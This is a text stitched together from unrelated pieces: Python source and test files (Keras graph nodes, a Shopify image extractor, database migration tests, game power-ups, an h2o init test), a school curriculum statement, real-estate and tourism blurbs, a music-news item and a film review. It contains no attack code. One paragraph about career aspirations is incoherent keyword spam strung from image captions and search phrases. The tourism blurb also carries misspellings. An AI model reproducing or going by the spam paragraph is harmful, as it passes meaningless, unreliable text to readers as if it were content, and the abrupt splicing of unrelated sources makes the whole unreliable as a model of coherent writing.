base_layer_utils.needs_keras_history( obj, ignore_call_context=True)): base_layer_utils.create_keras_history(obj) self._keras_inputs = [] self._keras_inputs_ids_and_indices = [] for i, ele in enumerate(self._flat_arguments): if is_keras_tensor(ele): self._keras_inputs.append(ele) kt_id = str(id(ele)) kt_index = i self._keras_inputs_ids_and_indices.append((kt_id, kt_index)) # Wire up Node to Layers. self.layer._inbound_nodes.append(self) for kt in self.keras_inputs: inbound_layer = kt._keras_history.layer if inbound_layer is not None: # `None` for `Input` tensors. inbound_layer._outbound_nodes.append(self) # Set metadata on outputs. node_index = len(self.layer._inbound_nodes) - 1 for i, tensor in enumerate(nest.flatten(outputs)): tensor._keras_history = KerasHistory( layer=layer, node_index=node_index, tensor_index=i) # Cached for performance. self.flat_input_ids = [str(id(t)) for t in self._keras_inputs] self.flat_output_ids = [str(id(t)) for t in nest.flatten(self.outputs)] @property def keras_inputs(self): """Tensors input to this node that can be traced back to a `keras.Input`.""" return self._keras_inputs @property def parent_nodes(self): """Returns all the `Node`s whose output this node immediately depends on.""" node_deps = [] for kt in self.keras_inputs: layer = kt._keras_history.layer node_index = kt._keras_history.node_index if layer is not None: # `None` for `Input` tensors. node_deps.append(layer._inbound_nodes[node_index]) return node_deps def iterate_inbound(self): """Yields tuples representing the data inbound from other nodes. Yields: tuples like: (inbound_layer, node_index, tensor_index, tensor). """ for kt in self.keras_inputs: keras_history = kt._keras_history layer = keras_history.layer node_index = keras_history.node_index tensor_index = keras_history.tensor_index yield layer, node_index, tensor_index, kt def map_arguments(self, tensor_dict): """Maps Keras Tensors to computed Tensors using `tensor_dict`.""" if self._single_positional_tensor_passed: # Performance optimization for most common case. kt_id, _ = self._keras_inputs_ids_and_indices[0] return (tensor_dict[kt_id].pop(),), {} else: flat_arguments = copy.copy(self._flat_arguments) for kt_id, kt_index in self._keras_inputs_ids_and_indices: flat_arguments[kt_index] = tensor_dict[kt_id].pop() args, kwargs = nest.pack_sequence_as((self.call_args, self.call_kwargs), flat_arguments) return args, kwargs def serialize(self, make_node_key, node_conversion_map): """Serializes `Node` for Functional API's `get_config`.""" # Serialization still special-cases first argument. args, kwargs = self.call_args, self.call_kwargs inputs, args, kwargs = self.layer._split_out_first_arg(args, kwargs) # Treat everything other than first argument as a kwarg. arguments = dict(zip(self.layer._call_fn_args[1:], args)) arguments.update(kwargs) kwargs = arguments def _serialize_keras_tensor(t): """Serializes a single Tensor passed to `call`.""" if hasattr(t, '_keras_history'): kh = t._keras_history node_index = kh.node_index node_key = make_node_key(kh.layer.name, node_index) new_node_index = node_conversion_map.get(node_key, 0) return [kh.layer.name, new_node_index, kh.tensor_index] if isinstance(t, np.ndarray): return t.tolist() if isinstance(t, ops.Tensor): return backend.get_value(t).tolist() return t kwargs = nest.map_structure(_serialize_keras_tensor, kwargs) try: json.dumps(kwargs, default=json_utils.get_json_type) except TypeError: kwarg_types = nest.map_structure(type, kwargs) raise TypeError('Layer ' + self.layer.name + ' was passed non-JSON-serializable arguments. ' + 'Arguments had types: ' + str(kwarg_types) + '. They cannot be serialized out ' 'when saving the model.') # `kwargs` is added to each Tensor in the first arg. This should be # changed in a future version of the serialization format. def serialize_first_arg_tensor(t): if is_keras_tensor(t): kh = t._keras_history node_index = kh.node_index node_key = make_node_key(kh.layer.name, node_index) new_node_index = node_conversion_map.get(node_key, 0) data = [kh.layer.name, new_node_index, kh.tensor_index, kwargs] else: # If an element in the first call argument did not originate as a # keras tensor and is a constant value, we save it using the format # ['_CONSTANT_VALUE', -1, serializaed_tensor_or_python_constant] # (potentially including serialized kwargs in an optional 4th argument data = [_CONSTANT_VALUE, -1, _serialize_keras_tensor(t), kwargs] return tf_utils.ListWrapper(data) data = nest.map_structure(serialize_first_arg_tensor, inputs) if (not nest.is_nested(data) and not self.layer._preserve_input_structure_in_config): data = [data] data = tf_utils.convert_inner_node_data(data) return data ############################################################# # Properties for Backwards compatibility. # These only check the first input argument # As nodes are internal, they may be removed in the future. ############################################################# @property def input_tensors(self): if self.is_input: return [self.outputs] # Used in `Layer.input`. return self.call_args[0] @property def output_tensors(self): if self.is_input: return [self.outputs] # Used in `Layer.input`. return self.outputs @property def input_shapes(self): input_shapes = nest.map_structure(backend.int_shape, self.input_tensors) if len(input_shapes) == 1 and not self.is_input: return input_shapes[0] return input_shapes @property def output_shapes(self): return nest.map_structure(backend.int_shape, self.output_tensors) @property def outbound_layer(self): return self.layer @property def inbound_layers(self): if self.is_input: return [] inbound_layers = nest.map_structure(lambda t: t._keras_history.layer, self.call_args[0]) return inbound_layers class KerasHistory( collections.namedtuple('KerasHistory', ['layer', 'node_index', 'tensor_index'])): """Tracks the Layer call that created a Tensor, for Keras Graph Networks. During construction of Keras Graph Networks, this metadata is added to each Tensor produced as the output of a Layer, starting with an `InputLayer`. This allows Keras to track how each Tensor was produced, and this information is later retraced by the `keras.engine.Network` class to reconstruct the Keras Graph Network. Attributes: layer: The Layer that produced the Tensor. node_index: The specific call to the Layer that produced this Tensor. Layers can be called multiple times in order to share weights. A new node is created every time a Layer is called. tensor_index: The output index for this Tensor. Always zero if the Layer that produced this Tensor only has one output. Nested structures of Tensors are deterministically assigned an index via `nest.flatten`. """ # Added to maintain memory and performance characteristics of `namedtuple` # while subclassing. __slots__ = () def is_keras_tensor(obj): return hasattr(obj, '_keras_history')
As outlined in our Vision and Values Statement, we aim to provide excellent learning opportunities for our pupils, promoting achievement in every area and nurturing social, emotional and spiritual wellbeing. As our children gain confidence, knowledge and skills we hope that they will go on to become compassionate, well balanced young people. They will take their place in society as active citizens, economically independent, exemplifying the British values of equality, tolerance, democracy, individual liberty and rule of law. Our starting point for curriculum design are our four foundations. We aim to help our pupils develop an inner discipline that encourages them to not just ‘follow the crowd’. We want them to make up their own minds using an evidence based approach and be ready to accept responsibility for what they do. They will grow through making choices, taking responsibility and being honest with themselves and others. SMSC is taught in a cross curricular way throughout the year groups (see our curriculum map) and is not limited to specific Personal, Social, Health and citizenship Education (PSHCE) or Religious Education (RE) lessons. Character and resilience are the qualities, the inner resources that we call on to get us through the frustrations and setbacks that are part and parcel of life. We must instil these qualities in our children and make sure that they are ready to make their way in the world as robust and confident individuals. In order to achieve this we have incorporated the five foundations for building character in to our curriculum: sport, creativity, performing, the world of work, volunteering and membership. At our school we see the Year 1 to Year 6 curriculum as a body of subject-specific knowledge defined by us and the National Curriculum and so we take a knowledge led approach. Skills are an outcome of the curriculum, not its purpose. When children are ‘fluent’ in knowledge, such as number bonds or 8 times tables-they can then apply them as skills. We have a clear focus on subjects as units to deliver the curriculum. Our Curriculum Map, and ‘Units of Work’ in every subject, contain the knowledge that we have identified as essential in our school. Our ‘Units of Work’ in each subject have been carefully crafted by expert teachers across our Four School Partnership, identifying composite tasks and breaking them down in to component tasks to ensure sequential, layered knowledge acquisition. These ‘Units of Work’ also support our particular style of teaching and help with the speedy and effective induction of new staff. This is particularly important in an inner London environment where the cost of accommodation prevents most of our staff from being able to stay with us long term. We use ‘Knowledge Organisers’ in order to help children with knowledge retention and issues around working memory. Our teaching style has a strong focus on the effective retention and use of subject specific vocabulary using ‘Walk The Word’ techniques. Each term we suspend the usual curriculum for a week in order for everyone to take part in a Whole School Project Week. In the recent past these have included Peace Week, Equalities Week, Christian Social Justice Week, Keeping Safe Week and careers Week. As we are situated in central London, we use London as our classroom, providing pupils with a very wide range of off site visits and visitors to enhance their learning. Look at the Curriculum Gallery section of our website for more information about individual subjects in our curriculum. Look at our Curriculum Map below for an overview of subjects, year by year. Look at our Curriculum Overviews for Parents/Carers to see termly information about our curriculum and how parents/carers might support children with their learning at home. We constantly review our curriculum through regular subject based monitoring activity across the Five School Partnership to ensure sequential, layered knowledge acquisition and check that pupil outcomes are of a very high quality. We retain banks of high quality pupil work in order to induct new staff to our schools as effectively as possible, sharing our very high expectations. Children love to show what they know and what they can do. They make very good progress using this approach as evidenced by our pupil achievement data year on year, the work in their books and their attitude to learning. What is your child learning this term?
# -*- coding: utf-8 -*- # Copyright 2019-2021 Mike Fährmann # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License version 2 as # published by the Free Software Foundation. """Extractors for Shopify instances""" from .common import BaseExtractor, Message from .. import text import re class ShopifyExtractor(BaseExtractor): """Base class for Shopify extractors""" basecategory = "shopify" filename_fmt = "{product[title]}_{num:>02}_{id}.{extension}" archive_fmt = "{id}" def __init__(self, match): BaseExtractor.__init__(self, match) self.item_url = self.root + match.group(match.lastindex) def items(self): data = self.metadata() yield Message.Directory, data headers = {"X-Requested-With": "XMLHttpRequest"} for url in self.products(): response = self.request( url + ".json", headers=headers, fatal=False) if response.status_code >= 400: self.log.warning('Skipping %s ("%s: %s")', url, response.status_code, response.reason) continue product = response.json()["product"] del product["image"] for num, image in enumerate(product.pop("images"), 1): text.nameext_from_url(image["src"], image) image.update(data) image["product"] = product image["num"] = num yield Message.Url, image["src"], image def metadata(self): """Return general metadata""" return {} def products(self): """Return an iterable with all relevant product URLs""" BASE_PATTERN = ShopifyExtractor.update({ "fashionnova": { "root": "https://www.fashionnova.com", "pattern": r"(?:www\.)?fashionnova\.com", }, "omgmiamiswimwear": { "root": "https://www.omgmiamiswimwear.com" }, }) class ShopifyCollectionExtractor(ShopifyExtractor): """Base class for collection extractors for Shopify based sites""" subcategory = "collection" directory_fmt = ("{category}", "{collection[title]}") pattern = BASE_PATTERN + r"(/collections/[\w-]+)/?(?:$|[?#])" test = ( ("https://www.fashionnova.com/collections/mini-dresses", { "range": "1-20", "count": 20, "archive": False, }), ("https://www.fashionnova.com/collections/mini-dresses/?page=1"), ("https://www.fashionnova.com/collections/mini-dresses#1"), ("https://www.omgmiamiswimwear.com/collections/fajas"), ) def metadata(self): return self.request(self.item_url + ".json").json() def products(self): params = {"page": 1} fetch = True last = None for pattern in ( r"/collections/[\w-]+/products/[\w-]+", r"href=[\"'](/products/[\w-]+)", ): search_re = re.compile(pattern) while True: if fetch: page = self.request(self.item_url, params=params).text urls = search_re.findall(page) if len(urls) < 3: if last: return fetch = False break fetch = True for path in urls: if last == path: continue last = path yield self.root + path params["page"] += 1 class ShopifyProductExtractor(ShopifyExtractor): """Base class for product extractors for Shopify based sites""" subcategory = "product" directory_fmt = ("{category}", "Products") pattern = BASE_PATTERN + r"((?:/collections/[\w-]+)?/products/[\w-]+)" test = ( ("https://www.fashionnova.com/products/essential-slide-red", { "pattern": r"https?://cdn\d*\.shopify.com/", "count": 3, }), ("https://www.omgmiamiswimwear.com/products/la-medusa-maxi-dress", { "pattern": r"https://cdn\.shopify\.com/s/files/1/1819/6171/", "count": 5, }), ("https://www.fashionnova.com/collections/flats/products/name"), ) def products(self): return (self.item_url,)
Tags are a very useful method to present CTAs on a specific page or on several pages. You can create as many tags as you need for the different CTAs you are running. Create – Go to Settings>Additional settings, and scroll down to the “Tags for Pages” section. Click on “Add page tag” and add the name of the tag. Click on ‘Apply’ at the bottom of the page to save. Relate To Pages – Go to Personalization > Scan Results tab and search for the URL you want to tag. Once it comes up, click on the ‘Edit’ button. You will see the tag/s you created in the drop down menu. Check the tag’s box and click on save. Use Tags In CTA – Go to Calls to Action and click on “New Call to Action”, then scroll down to the “By tags” section. You will see the tags you have created. Choose the tag you want and to include/exclude.
# -*- coding: utf-8 -*- import os import glob from flexmock import flexmock, flexmock_teardown from .. import EloquentTestCase from eloquent.migrations import Migrator, DatabaseMigrationRepository, Migration from eloquent import DatabaseManager from eloquent.connections import Connection class MigratorTestCase(EloquentTestCase): def tearDown(self): flexmock_teardown() def test_migrations_are_run_up_when_outstanding_migrations_exist(self): resolver = flexmock(DatabaseManager) resolver.should_receive('connection').and_return(None) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) g = flexmock(glob) g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([ os.path.join(os.getcwd(), '2_bar.py'), os.path.join(os.getcwd(), '1_foo.py'), os.path.join(os.getcwd(), '3_baz.py') ]) migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo']) migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1) migrator.get_repository().should_receive('log').once().with_args('2_bar', 1) migrator.get_repository().should_receive('log').once().with_args('3_baz', 1) bar_mock = flexmock(MigrationStub()) bar_mock.should_receive('up').once() baz_mock = flexmock(MigrationStub()) baz_mock.should_receive('up').once() migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock) migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock) migrator.run(os.getcwd()) def test_up_migration_can_be_pretended(self): resolver_mock = flexmock(DatabaseManager) resolver_mock.should_receive('connection').and_return({}) resolver = flexmock(DatabaseManager({})) connection = flexmock(Connection(None)) connection.should_receive('pretend').replace_with(lambda callback: callback(None)) resolver.should_receive('connection').with_args(None).and_return(connection) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) g = flexmock(glob) g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([ os.path.join(os.getcwd(), '2_bar.py'), os.path.join(os.getcwd(), '1_foo.py'), os.path.join(os.getcwd(), '3_baz.py') ]) migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo']) migrator.get_repository().should_receive('get_next_batch_number').once().and_return(1) bar_mock = flexmock(MigrationStub()) bar_mock.should_receive('get_connection').once().and_return(None) bar_mock.should_receive('up').once() baz_mock = flexmock(MigrationStub()) baz_mock.should_receive('get_connection').once().and_return(None) baz_mock.should_receive('up').once() migrator.should_receive('_resolve').with_args(os.getcwd(), '2_bar').once().and_return(bar_mock) migrator.should_receive('_resolve').with_args(os.getcwd(), '3_baz').once().and_return(baz_mock) migrator.run(os.getcwd(), True) def test_nothing_is_done_when_no_migrations_outstanding(self): resolver_mock = flexmock(DatabaseManager) resolver_mock.should_receive('connection').and_return(None) resolver = flexmock(DatabaseManager({})) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) g = flexmock(glob) g.should_receive('glob').with_args(os.path.join(os.getcwd(), '*_*.py')).and_return([ os.path.join(os.getcwd(), '1_foo.py') ]) migrator.get_repository().should_receive('get_ran').once().and_return(['1_foo']) migrator.run(os.getcwd()) def test_last_batch_of_migrations_can_be_rolled_back(self): resolver = flexmock(DatabaseManager) resolver.should_receive('connection').and_return(None) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) foo_migration = MigrationStub('foo') bar_migration = MigrationStub('bar') migrator.get_repository().should_receive('get_last').once().and_return([ foo_migration, bar_migration ]) bar_mock = flexmock(MigrationStub()) bar_mock.should_receive('down').once() foo_mock = flexmock(MigrationStub()) foo_mock.should_receive('down').once() migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock) migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock) migrator.get_repository().should_receive('delete').once().with_args(bar_migration) migrator.get_repository().should_receive('delete').once().with_args(foo_migration) migrator.rollback(os.getcwd()) def test_rollback_migration_can_be_pretended(self): resolver_mock = flexmock(DatabaseManager) resolver_mock.should_receive('connection').and_return({}) resolver = flexmock(DatabaseManager({})) connection = flexmock(Connection(None)) connection.should_receive('pretend').replace_with(lambda callback: callback(None)) resolver.should_receive('connection').with_args(None).and_return(connection) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) foo_migration = MigrationStub('foo') bar_migration = MigrationStub('bar') migrator.get_repository().should_receive('get_last').once().and_return([ foo_migration, bar_migration ]) bar_mock = flexmock(MigrationStub()) bar_mock.should_receive('down').once() foo_mock = flexmock(MigrationStub()) foo_mock.should_receive('down').once() migrator.should_receive('_resolve').with_args(os.getcwd(), 'bar').once().and_return(bar_mock) migrator.should_receive('_resolve').with_args(os.getcwd(), 'foo').once().and_return(foo_mock) migrator.rollback(os.getcwd(), True) def test_nothing_is_rolled_back_when_nothing_in_repository(self): resolver = flexmock(DatabaseManager) resolver.should_receive('connection').and_return(None) migrator = flexmock( Migrator( flexmock( DatabaseMigrationRepository( resolver, 'migrations' ) ), resolver ) ) migrator.get_repository().should_receive('get_last').once().and_return([]) migrator.rollback(os.getcwd()) class MigrationStub(Migration): def __init__(self, migration=None): self.migration = migration def up(self): pass def down(self): pass def __getitem__(self, item): return self.migration
Our new home in Sauk City! After 17 years at the Dallas Street location, we have up and moved just down the street to 855 Community Drive. Though we will miss our home of so many years, the move was needed to house our ever-growing and expanding group of professional staff. We were bursting at the seams at our old location and went searching for something to fit our needs and budget. We were able to purchase a building nearby and started working on the plans to renovate it for our own use. All design was in-house and our team did a fabulous job in turning words and visions in to plans, construction and finishing touches. Our Civil department pulled off a beautiful site design. The structural department provided the framework for the architectural staff to creatively work with. Our mechanical systems not only fit our needs today but they are designed to expand with us into the future. The goal was for our facility to look and feel “crisp and professional” and our interior designer pulled that off to a tee. It is amazing how each and every aspect was pre-planned, prepared for, and then implemented. Our CEO wanted everyone to be involved and requested anyone who had ideas or input to say so. This all started well before our actual designs were starting and continued throughout the design and construction process. All ideas were seen as important and considered. Some were incorporated and some were not. It just goes to show how personally vested everyone has been. Even after design, our employees were excited and involved. From planning logistics, to packing, to putting furniture together, to setting up workstations and more, everyone at Ramaker jumped in to help. Our new office home is bright and airy, with room for growth. There’s more office space, break room space, and parking space. We have commuter bikes for lunchtime errands or just a brief getaway from the office. There are splashes of color and abundant plant life everywhere. And the entrance…..just wow! After all this, it’s time to party! Join us in moving on to bigger and better things at our Open House event on Wednesday, November 4th at 5:00 pm.
import random from objects.globals.gamesettings import GameSettings from objects.powerup import PowerUp class PowerUpGenerator: """Base class for power ups generators""" def __init__(self, player, imgResources, all_sprites, powerups): self.player = player self.imgResources = imgResources self.all_sprites = all_sprites self.power_ups = powerups def generate(self): """base dummy implementation for genrating power up""" pass class ShieldGenerator(PowerUpGenerator): """Generates random shield""" def generate(self): """Method used for generating shield, if created shield added to sprite context""" if self.player.shield < 50 and random.random() > GameSettings.SHIELD_PROP: shield = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups, self.imgResources.POWER_UP_SHIELD) self.power_ups.add(shield) self.all_sprites.add(shield) class GunGenerator(PowerUpGenerator): """Generates random gun""" def generate(self): """Method used for generating gun, if created gun added to sprite context""" if random.random() > GameSettings.GUN_PROP: gun = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups, self.imgResources.POWER_UP_GUN) self.power_ups.add(gun) self.all_sprites.add(gun) class FuelGenerator(PowerUpGenerator): """Generates random fuel pack""" def generate(self): """Method used for generating fuel, if created fuel added to sprite context""" count = len(list(filter(lambda x: x.type == self.imgResources.POWER_UP_FUEL, self.power_ups))) if count < 2 and self.player.fuel < 80 and random.random() > GameSettings.FUEL_PROP: fuel = PowerUp((random.randint(200, GameSettings.WIDTH - 200), 0), self.imgResources.power_ups, self.imgResources.POWER_UP_FUEL) self.power_ups.add(fuel) self.all_sprites.add(fuel)
China is a vast land, rich in tourism resources. It comes out in front in the world in scenic spots and historical sites, spectacular landscapes, and colorful and varied national customs. China is forever linked to its ancient civilization, friendly people, and many of the world's most revered treasures, such as The Great Wall, Terra-Cotta Warriors and Horses and the Yangtze River. Today, one can also find spectacular architecture and towering skylines in Shanghai and Beijing, a wealth of luxury accommodations and exquisite cuisine. China's capital city Beijing is also known as a tourist city for its many places of interest, including ancient architecture, royal gardens, mansions, towers, temples, palaces, and modern structures. Anotehr famous tourist spot Chengdu has many places of interest and is famous for its traditional arts and crafts, ethnic folklore, and beautiful landscapes. The flourishing coastal city of Dalian is the major port for this northeastern province and is a magnet for foreign investors. A metropolis both ancient and modern, Nanjing has many places of interest, such as the Confucian Temple and the Sun Yat-sen Mausoleum. Shanghai is an ideal "shopping paradise." There are over a thousand restaurants serving the famous 16 styles of Chinese food. Sanghai has convenient land, air and sea transportation, rich tourist resources, a vast variety of foods and recreational facilities. Come and see why China is drawing millions of visitors from all over the world. Stay in comfortable budget hotels in China and experience Chinese hospitality and culture.
# -*- coding: utf-8 -*- """ Dump tdx_flow files to pickle Created on Sun Jul 26 18:51:24 2015 @author: Sein Tao @email: sein.tao@gmail.com """ # import sys # sys.path.append("..") import os import pickle import datetime import dateutil.relativedelta from parse_flow import parse_tdx_flow, FlowRecord datadir="D:\Personal\Finnance\Stock\Flow" def dump_flow(month_start, month_end, outfile, datadir=datadir): """Dump tdx_flow files to pickle""" str2date = lambda x: datetime.datetime.strptime(x, '%Y%m') date2str = lambda x: datetime.datetime.strftime(x, '%Y%m') one_month = dateutil.relativedelta.relativedelta(months=1) start, end = str2date(month_start), str2date(month_end) if start > end: raise ValueError("start month should be less than end month") recs = [] current = start while current <= end: file = os.path.join(datadir, 'flow'+date2str(current)+".xls") recs.extend(parse_tdx_flow(file)) current += one_month with open(outfile, 'wb') as fh: pickle.dump(recs, fh) def dump2txt(dump_file, out_file): ih = open(dump_file, 'rb') data = pickle.load(ih) ih.close() oh = open(out_file, 'w') oh.write("#" + "\t".join(FlowRecord.Raw._fields) + "\n") for rec in data: oh.write("\t".join(rec.raw)) oh.write("\n") oh.close() def load_flow(dump_file): return pickle.load(open(dump_file, 'rb')) if __name__ == '__main__': data_file = os.path.join(datadir, '2014.pickle') #dump_flow('201405', '201412', data_file) #data = pickle.load(open(data_file, 'rb')) #dump2txt(data_file, os.path.join(datadir,'2014.txt')) import unittest class Test(unittest.TestCase): def setUp(self): self.ref = os.path.join(datadir, '2014.pickle') self.tmp = "tmp/flow.pickle" def test_dump(self): import filecmp dump_flow('201405', '201412', self.tmp) self.assertTrue(filecmp.cmp(self.ref, self.tmp)) def test_load(self): self.assertEqual(load_flow(self.ref), load_flow(self.tmp)) from util import runTestCase runTestCase(Test)
Chart britain s top childhood career aspirations statista leap skills academy helping students achieve their dream job occupation aspiration concept stock photo. Long term illustration of to climb the and make big inspiration motivational social justice innovation person. Focused resume example best online builder sn chieni cookson educational among in no more than words. Testing your path ministry photo attitude agriculture. Business essay success managers the. Research paper reasons for choosing quotes we love key talent development asia blog among. Goals our work women retailing springer examples application form sample customer service news insights aspirations. Statements doc tk vaibhav pathare retail builder. Combining entrepreneurship web high school personality types a major determining factor. Undergraduate dissertation examples essay methodology introduction dream job occupation career aspiration concept stock photo best images about karmic ally coaching s collection of. Aspirations resume online builder e library embedding of employer and practitioner input into college paper academic writing service. Top interview questions security guards companies. Apple bridge fully funded apprenticeships sn chieni cookson educational among on goals essay. Our work awards unb goal in builder. Boy thinking image essays for the future scholarship little figures picture why are so few women promoted management positions pdf customer service objective becoming unapologetic heya emily handdrawn men image. Shyenne horras. Career beliefs of greek and non vocational education students aerospace studies scholarship opportunities wia objectives goals essay. Great expectations teenagers aspirations versus the careers long term aspiration. Answering plan interview questions men vs women how gender can impact key examples. Talent development asia blog not sure what your current are or you yours personal professional infographic. Class shares employee engagement working for life workers their. Global aspiration survey manpowergroup management search results shadrack oiye. Illustration business stock dream job occupation concept photo image youth in n archives is examples statements essay resume. Achievement as a group jinho jace park becoming unapologetic heya emily. Engineering perceptions soft skills industry our work infographic online publication. Science minority ethnic best quotes sayings financial outlook profit road modern african r ce novels amu dat. Gulf news advertisement hr s training programs.
# -*- coding: utf-8 -*- import arrow from flask import ( render_template, current_app, url_for ) from feedback.database import ( Column, db, Model ) from feedback.utils import send_email class Monthly(Model): ''' The monthly report model - this only contains one field: a string of e-mails separated by commas if necessary. ''' __tablename__ = 'monthly-report' id = Column(db.Integer, primary_key=True, index=True) email_list = Column(db.String(200), nullable=True) def __repr__(self): return '<Monthly(id:{0}, emails:{1})>'.format( self.id, self.email_list) def send_report(self): ''' From an instance of the Monthly model, send out an e-mail saying that this months monthly report is ready. This gets pinged from a server task every month through Heroku. In theory. ''' if self.email_list is None: subj = 'Permitting Inspection Center Monthly Status Report' current_app.logger.info( 'NO-EMAIL-ADDRESS | Subject: {}'.format(subj)) else: subj = 'Permitting Inspection Center Monthly Status Report - {}' from_email = current_app.config.get('ADMIN_EMAIL') last_month = arrow.utcnow().replace(months=-1) date_start, date_end = last_month.span('month') date_header = date_start.format('MMMM, YYYY') year = last_month.format('YYYY') month = last_month.format('MM') report = url_for( 'reports.overview', _external=True, year=year, month=month) send_email( subj.format(date_header), from_email, self.email_list, render_template('email/monthly_notification.txt', date_header=date_header, report=report), render_template('email/monthly_notification.html', date_header=date_header, report=report))
Built in 1902 as The Belgravia Hotel and also known as Peale House, The Belgravia Condominiums places residents in the middle of the best that Center City Philadelphia has to offer. Having been added to the National Register of Historic Places in 1982, The Belgravia’s beautiful Beaux-Arts exterior and lobby lined with stained-glass windows complement the elegance that permeates the building’s living spaces. Condo units feature spacious living areas, marble bathrooms, and stackable washer and dryers. Kitchens feature stainless steel appliances and granite counter tops. Building amenities include 24/7 doorman and concierge, 24-hour on-site gym, and a recently updated lobby. The Belgravia is situated just steps away from Rittenhouse Square and Center City Philadelphia’s business district. Residents can enjoy fine dining and retail on Chestnut and Walnut Streets or can take nearby public transportation to explore other parts of the city. Let the James ‘Right’ Price’s real estate acumen find your new Philadelphia luxury conominium home in this historic and conveniently-located architectural gem today!
from __future__ import print_function import sys sys.path.insert(1,"../../../") from tests import pyunit_utils import h2o from h2o.utils.typechecks import assert_is_type from h2o.exceptions import H2OConnectionError def h2oinit(): """ Python API test: h2o.init(url=None, ip=None, port=None, https=None, insecure=None, username=None, password=None, cookies=None, proxy=None, start_h2o=True, nthreads=-1, ice_root=None, enable_assertions=True, max_mem_size=None, min_mem_size=None, strict_version_check=None, **kwargs) """ start_h2o = False strict_version_check = False print("Testing h2o.init() command...") try: h2o.init(start_h2o=start_h2o) print("h2o.init() command works!") except Exception as e: # some errors are okay like version mismatch print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) try: h2o.init(strict_version_check=strict_version_check, start_h2o=start_h2o) except Exception as e: print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) # try to join a cluster and test out various command arguments ipS = "127.16.2.27" portS = "54321" nthread = 2 max_mem_size=10 min_mem_size=3 try: h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, min_mem_size=min_mem_size, start_h2o=start_h2o, strict_version_check=strict_version_check) print("Command h2o.init(ip=ipS, port=portS, nthreads=nthread, max_mem_size=max_mem_size, " "min_mem_size=min_mem_size,start_h2o=start_h2o, strict_version_check=strict_version_check) works!") except Exception as e: # make sure correct error message is received print("error message type is {0} and the error message is \n".format(e.__class__.__name__, e.args[0])) assert_is_type(e, H2OConnectionError) if __name__ == "__main__": pyunit_utils.standalone_test(h2oinit) else: h2oinit()
Apex Zero took some time out recently to speak with Andrew Kay for British magazine Guestlist recently to speak on his new album “Reality Provoking Liberation” which released on Monday 28th October. It’s the debut solo album from the London rapper and producer, a brief departure from his work as part of the hip hop duo First and Last. It’s had an impressive media response in the past couple of months, with an appreciation not only for the conscientious lyricism addressing a range of political and social issues, but the ferocity of the delivery and quality in production.
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import proto # type: ignore __protobuf__ = proto.module( package='google.ads.googleads.v7.resources', marshal='google.ads.googleads.v7', manifest={ 'AdScheduleView', }, ) class AdScheduleView(proto.Message): r"""An ad schedule view summarizes the performance of campaigns by AdSchedule criteria. Attributes: resource_name (str): Output only. The resource name of the ad schedule view. AdSchedule view resource names have the form: ``customers/{customer_id}/adScheduleViews/{campaign_id}~{criterion_id}`` """ resource_name = proto.Field( proto.STRING, number=1, ) __all__ = tuple(sorted(__protobuf__.manifest))
The story of the prophet who abandons his family and the woman he loves, in order to relay God’s message in Jerusalem. Although he is persecuted and branded as a traitor for warning others of the destruction of the Holy City, he continues fearlessly with his mission. When his prophecy is fulfilled, he experiences first-hand Jerusalem’s destruction by the Babylonians. Starring two-time Golden Globe® nominee Patrick Dempsey (TV’s “Grey’s Anatomy,” Made of Honor) as Jeremiah, Oscar® nominee Klaus Maria Brandauer (Best Supporting Actor, Out of Africa, 1985) as King Nebuchadnezzar, and Oliver Reed (Gladiator, Tommy) as General Safan. We had read Jeremiah many times, but somehow when we watched this film, it came alive and the scripture made more sense with the context. Also another fairly accurate rendering.
